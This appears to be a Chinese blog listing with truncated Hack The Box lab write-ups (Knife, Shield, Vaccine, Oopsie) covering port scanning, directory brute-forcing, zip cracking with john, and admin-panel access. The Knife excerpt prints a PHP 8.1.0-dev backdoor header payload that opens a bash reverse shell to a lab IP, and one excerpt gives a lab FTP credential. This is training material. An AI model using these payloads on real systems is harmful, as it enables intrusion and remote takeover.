Hack the box
关注
分享
扫一扫
显哥无敌
南京赵显
展开
-
Hack the box knife
1.nmap -sC -sV 10.10.10.242 //常规扫 22,80端口2.wappalyzer扫指纹 注意到PHP版本是8.1.0-dev这个版本的PHP最近被爆出来存在远程代码执行漏洞具体看这个:https://zhuanlan.zhihu.com/p/381142917直接上payload User-Agentt: zerodiumsystem("/bin/bash -c ‘bash -i >&/dev/tcp/10.10.14.113/6666 0>&1原创 2021-07-15 17:09:25 · 174 阅读 · 1 评论 -
Hack the box shield
这一台靶机需要用到上一台靶机的地方是上一台靶机数据库用户的密码1.日常操作,NMAP扫ip nmap -sC -sV 10.10.10.29就扫出来一个80端口2.浏览器页面源码审计,看到了wordpress wp-contents之类的路径,那么wordpress是八九不离十了,为了确认以下还可以扫一下路径,gobuster和dirsearch二选一gobuster dir -u http://10.10.10.29 -w /usr/share/wordlists/dirb/common.txtd原创 2021-07-04 18:46:20 · 148 阅读 · 2 评论 -
Hack the box vaccine
上一台靶机的线索FTP账号 ftpuser/mc@F1l3ZilL41.日常nmap -sC -sV 10.10.10.46,开放21,22,80端口2.结合上一台靶机拿到的FTP账号,密码,登录FTP服务器,dir看到backup.zip,拿到备份文件3.解密,用kali里面的john 先用zip2john backup.zip>hash //生成hash值,解密效率更高john hash --fork=4 -w /usr/share/wordlists/rockyou.txt 2>原创 2021-07-03 21:26:56 · 293 阅读 · 0 评论 -
Hack the box Oopsie
1.靶机IP 10.10.10.28,常规nmap -sC -sV 10.10.10.28扫端口,扫出22和80端口2.打开浏览器,访问80端口,页面上没有啥,查看源码,找到/cdn-cgi/login,找到后台登录入口3.登录,用户名 admin 密码没啥特别提示,尝试上一台靶机的密码,果然一样4.后台四个模块,account模块管理账户信息,uploads上传文件看见uploads,就知道找到了shell上传点,点开需要super_admin权限,通过抓包发现,其实是通过cookie里面的use原创 2021-07-03 19:20:17 · 398 阅读 · 0 评论